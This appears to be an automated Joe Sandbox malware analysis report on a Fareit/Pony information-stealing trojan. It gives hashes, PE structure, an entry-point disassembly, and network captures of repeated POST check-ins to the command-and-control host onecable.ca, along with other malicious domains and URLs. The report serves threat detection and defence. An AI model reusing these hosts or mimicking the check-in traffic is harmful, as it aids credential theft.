                                  https://www.ecosia.org/newtab/pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://login.live.copbfe2Xcxue.exe, 00000000.00000003.2023274882.0000000000562000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      3.33.130.190
                                      onecable.caUnited States
                                      8987AMAZONEXPANSIONGBtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1583552
                                      Start date and time:2025-01-03 03:11:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 57s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:5
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:pbfe2Xcxue.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:604b748dca0419d94b618beb4c5b4710.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@12/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 95
                                      • Number of non-executed functions: 44
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      No simulations
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3.33.130.190RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                      • freegeoip.net/xml/
                                      file.exeGet hashmaliciousFormBookBrowse
                                      • www.emi.wtf/gd04/?uvC=N20YWnVHT5RQC6WMyDV2V8c+DcGptM14OKih1BJNLsVd899Y1bUoCinKVTGhqICNh0dB&UlPxR=-Z1dwda8VP90AL
                                      TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                      • www.medicaresbasics.xyz/fm31/
                                      236236236.elfGet hashmaliciousUnknownBrowse
                                      • lojasdinastia.com.br/
                                      TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                      • www.medicaresbasics.xyz/fm31/
                                      profroma invoice.exeGet hashmaliciousFormBookBrowse
                                      • www.iglpg.online/rbqc/
                                      SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                      • www.tdassetmgt.info/d55l/
                                      goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                      • www.deikamalaharris.info/lrgf/
                                      ORDER-401.exeGet hashmaliciousFormBookBrowse
                                      • www.likesharecomment.net/nqht/
                                      Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                      • www.cbprecise.online/cvmn/
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AMAZONEXPANSIONGBhttps://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                      • 3.33.220.150
                                      Sylacauga AL License.msgGet hashmaliciousUnknownBrowse
                                      • 3.32.86.144
                                      RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                      • 3.33.130.190
                                      http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                      • 52.223.40.198
                                      Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                      • 52.223.13.41
                                      T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                      • 52.223.40.198
                                      telnet.sh4.elfGet hashmaliciousUnknownBrowse
                                      • 52.223.138.114
                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                      • 96.127.3.82
                                      jklspc.elfGet hashmaliciousUnknownBrowse
                                      • 3.47.75.42
                                      nabarm.elfGet hashmaliciousUnknownBrowse
                                      • 3.37.62.206
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.630663584435947
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:pbfe2Xcxue.exe
                                      File size:126'464 bytes
                                      MD5:604b748dca0419d94b618beb4c5b4710
                                      SHA1:afec5dc4982d4ea85722448d2e8155274902c141
                                      SHA256:b613f1a4fe5e99b6c4d32e72bef59d1e270a337b5b5d4e775cfb58a18b38c66e
                                      SHA512:a1b5b4c44dd61bac6eeb5c7a4badf06d73d8cf7d47ce652b5632ca5c0c76932aec19244fd847fdf4fba67b6dd73b9d2feeb95b9511c104a431805ac609fbd730
                                      SSDEEP:3072:I9Jnbm6LkxaPAkseoTgnA4rY9Wv5arpT:eL54kseoUn5Y9M5a1T
                                      TLSH:2DC3D0D0D6D11473D7B4183B3EF2AC37E73696BA1CB4075921C4D24AAAAB643613BC87
                                      File Content Preview:MZ......................@...............................................!..L.!..That program must be run under Win32..$7........PE..L.....DD................. ...........'.......0....@.......................................@................................
                                      Icon Hash:185888c999ad878b
                                      Entrypoint:0x4027fa
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4444AEFD [Tue Apr 18 09:18:53 2006 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:a93e84a8e774b03b9e034323a5c06d79
                                      Instruction
                                      lea eax, dword ptr [esp]
                                      sub ax, 0000F000h
                                      jc 00007F2B7C7E878Eh
                                      mov eax, 00403068h
                                      mov ecx, eax
                                      mov edx, eax
                                      mov esi, dword ptr [edx]
                                      sub edi, edi
                                      mov eax, 00403328h
                                      push eax
                                      sub dword ptr [esp], 40h
                                      call dword ptr [00403008h]
                                      sub esi, eax
                                      xchg eax, edi
                                      push 00000100h
                                      pop ecx
                                      bswap ecx
                                      sub esi, ecx
                                      jc 00007F2B7C7E8763h
                                      push edi
                                      pop ecx
                                      add ecx, dword ptr [ecx+3Ch]
                                      mov ebx, 00000040h
                                      pushad
                                      sub ecx, FFFFFF7Ch
                                      lea esi, dword ptr [004032E8h]
                                      cmp ebx, dword ptr [ecx]
                                      jnc 00007F2B7C7E8747h
                                      push 00000002h
                                      pop ecx
                                      loop 00007F2B7C7E86E6h
                                      popad
                                      ret
                                      adc ecx, esi
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x30740xa0.data
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1bea5.RData
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x28530x1c
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x18530x1a00d7556d18ec1eafbd1a8304c6ccd1dc6bFalse0.24699519230769232data4.836524364195282IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0x30000x6e80x800c96afe7f386625fb23e7c0efbf7c7833False0.2080078125data2.251686995208463IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_NRELOC_OVFL, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .RData0x40000x1bea50x1c0009936674d5a9382e048705f487b2c3ed3False0.9247959681919643data7.827027769632456IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_NRELOC_OVFL, IMAGE_SCN_MEM_READ
                                      .Adata0x200000x7220x800c99a74c555371a433d121f551d6c6398False0.01123046875data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x1becd0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5204356846473029
                                      RT_ICON0x1e4750x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.649155722326454
                                      RT_ICON0x1f51d0x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.7135245901639344
                                      RT_RCDATA0x45210x1797cdata0.9897450225588807
                                      RT_GROUP_ICON0x1be9d0x30data0.8541666666666666
                                      RT_MANIFEST0x41900x391XML 1.0 document, ASCII text, with CRLF line terminators0.4414019715224535
                                      DLLImport
                                      KERNEL32.dllSetCurrentDirectoryA, SetLastError, GetModuleHandleA, lstrcpyW, GetProcessHeap, GetModuleFileNameA, IsValidLocale, lstrcpyW, VirtualAllocEx, lstrcpyW, GetStdHandle, lstrcpyW, FindNextVolumeA, lstrlenW, GetLocaleInfoA, FindFirstVolumeA, CreateEventA, DeleteFileA, SetConsoleTitleA, GetStartupInfoW, GetVolumePathNameW, IsBadStringPtrA, lstrcpyW
                                      UNTFS.dllFormat, ChkdskEx, Extend, Recover
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-03T03:12:50.647005+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4497363.33.130.19080TCP
                                      2025-01-03T03:12:56.151035+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4497543.33.130.19080TCP
                                      2025-01-03T03:13:01.668659+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4497883.33.130.19080TCP
                                      2025-01-03T03:13:10.087497+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4498423.33.130.19080TCP
                                      2025-01-03T03:13:16.509557+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4498853.33.130.19080TCP
                                      2025-01-03T03:13:22.010132+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4499233.33.130.19080TCP
                                      2025-01-03T03:13:30.447507+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4499733.33.130.19080TCP
                                      2025-01-03T03:13:35.917877+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.4500093.33.130.19080TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 3, 2025 03:12:50.634217024 CET4973680192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:50.640356064 CET80497363.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:50.640422106 CET4973680192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:50.641019106 CET4973680192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:50.646931887 CET80497363.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:50.647005081 CET4973680192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:50.651873112 CET80497363.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:51.126099110 CET80497363.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:51.126291990 CET80497363.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:51.126348019 CET4973680192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:51.128118992 CET4973680192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:51.132925987 CET80497363.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:56.140645981 CET4975480192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:56.145589113 CET80497543.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:56.145658970 CET4975480192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:56.146125078 CET4975480192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:56.150945902 CET80497543.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:56.151035070 CET4975480192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:56.155802011 CET80497543.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:56.628221989 CET80497543.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:56.634727955 CET80497543.33.130.190192.168.2.4
                                      Jan 3, 2025 03:12:56.636090994 CET4975480192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:56.636178017 CET4975480192.168.2.43.33.130.190
                                      Jan 3, 2025 03:12:56.640974998 CET80497543.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:01.658592939 CET4978880192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:01.663499117 CET80497883.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:01.663567066 CET4978880192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:01.663772106 CET4978880192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:01.668602943 CET80497883.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:01.668658972 CET4978880192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:01.673489094 CET80497883.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:05.065531969 CET80497883.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:05.065762997 CET80497883.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:05.065907001 CET4978880192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:05.066648006 CET4978880192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:05.071444988 CET80497883.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:10.077754021 CET4984280192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:10.082577944 CET80498423.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:10.082645893 CET4984280192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:10.082688093 CET4984280192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:10.087447882 CET80498423.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:10.087496996 CET4984280192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:10.092298985 CET80498423.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:11.483465910 CET80498423.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:11.483606100 CET80498423.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:11.483652115 CET4984280192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:11.484787941 CET4984280192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:11.489553928 CET80498423.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:16.499670029 CET4988580192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:16.504565001 CET80498853.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:16.504657030 CET4988580192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:16.504730940 CET4988580192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:16.509509087 CET80498853.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:16.509557009 CET4988580192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:16.514388084 CET80498853.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:16.987520933 CET80498853.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:16.987648964 CET80498853.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:16.987694025 CET4988580192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:16.989178896 CET4988580192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:16.994035006 CET80498853.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:21.999797106 CET4992380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:22.004960060 CET80499233.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:22.005039930 CET4992380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:22.005090952 CET4992380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:22.009957075 CET80499233.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:22.010132074 CET4992380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:22.014903069 CET80499233.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:25.425403118 CET80499233.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:25.425523043 CET80499233.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:25.425575018 CET4992380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:25.427186966 CET4992380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:25.431922913 CET80499233.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:30.437077999 CET4997380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:30.441971064 CET80499733.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:30.442039013 CET4997380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:30.442671061 CET4997380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:30.447452068 CET80499733.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:30.447506905 CET4997380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:30.452318907 CET80499733.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:30.896998882 CET80499733.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:30.897197008 CET80499733.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:30.897463083 CET4997380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:30.898119926 CET4997380192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:30.902857065 CET80499733.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:35.905947924 CET5000980192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:35.911638021 CET80500093.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:35.911926031 CET5000980192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:35.911963940 CET5000980192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:35.917387962 CET80500093.33.130.190192.168.2.4
                                      Jan 3, 2025 03:13:35.917876959 CET5000980192.168.2.43.33.130.190
                                      Jan 3, 2025 03:13:35.922844887 CET80500093.33.130.190192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 3, 2025 03:12:00.366153002 CET6128053192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:00.375138998 CET53612801.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:05.391355991 CET5770153192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:05.400317907 CET53577011.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:10.405637026 CET6060453192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:10.415417910 CET53606041.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:15.421294928 CET5633653192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:15.430360079 CET53563361.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:20.447956085 CET6098653192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:20.457366943 CET53609861.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:25.468312979 CET5857553192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:25.498440981 CET53585751.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:30.515392065 CET5928753192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:30.524576902 CET53592871.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:35.530777931 CET5593153192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:35.541213036 CET53559311.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:40.546464920 CET5727553192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:40.556389093 CET53572751.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:45.562024117 CET6442053192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:45.593322039 CET53644201.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:50.609210014 CET5365153192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:50.621644020 CET53536511.1.1.1192.168.2.4
                                      Jan 3, 2025 03:12:50.622361898 CET5172953192.168.2.41.1.1.1
                                      Jan 3, 2025 03:12:50.632457018 CET53517291.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 3, 2025 03:12:00.366153002 CET192.168.2.41.1.1.10xb29bStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:05.391355991 CET192.168.2.41.1.1.10x2d2aStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:10.405637026 CET192.168.2.41.1.1.10x4becStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:15.421294928 CET192.168.2.41.1.1.10xe25dStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:20.447956085 CET192.168.2.41.1.1.10xda64Standard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:25.468312979 CET192.168.2.41.1.1.10x5a97Standard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:30.515392065 CET192.168.2.41.1.1.10x2bf0Standard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:35.530777931 CET192.168.2.41.1.1.10xb48fStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:40.546464920 CET192.168.2.41.1.1.10x50abStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:45.562024117 CET192.168.2.41.1.1.10xe7e0Standard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:50.609210014 CET192.168.2.41.1.1.10xc48eStandard query (0)oliviagurun.comA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:50.622361898 CET192.168.2.41.1.1.10xf9dfStandard query (0)onecable.caA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 3, 2025 03:12:00.375138998 CET1.1.1.1192.168.2.40xb29bName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:05.400317907 CET1.1.1.1192.168.2.40x2d2aName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:10.415417910 CET1.1.1.1192.168.2.40x4becName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:15.430360079 CET1.1.1.1192.168.2.40xe25dName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:20.457366943 CET1.1.1.1192.168.2.40xda64Name error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:25.498440981 CET1.1.1.1192.168.2.40x5a97Name error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:30.524576902 CET1.1.1.1192.168.2.40x2bf0Name error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:35.541213036 CET1.1.1.1192.168.2.40xb48fName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:40.556389093 CET1.1.1.1192.168.2.40x50abName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:45.593322039 CET1.1.1.1192.168.2.40xe7e0Name error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:50.621644020 CET1.1.1.1192.168.2.40xc48eName error (3)oliviagurun.comnonenoneA (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:50.632457018 CET1.1.1.1192.168.2.40xf9dfNo error (0)onecable.ca3.33.130.190A (IP address)IN (0x0001)false
                                      Jan 3, 2025 03:12:50.632457018 CET1.1.1.1192.168.2.40xf9dfNo error (0)onecable.ca15.197.148.33A (IP address)IN (0x0001)false
                                      • onecable.ca
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.4497363.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:12:50.641019106 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:12:50.647005081 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
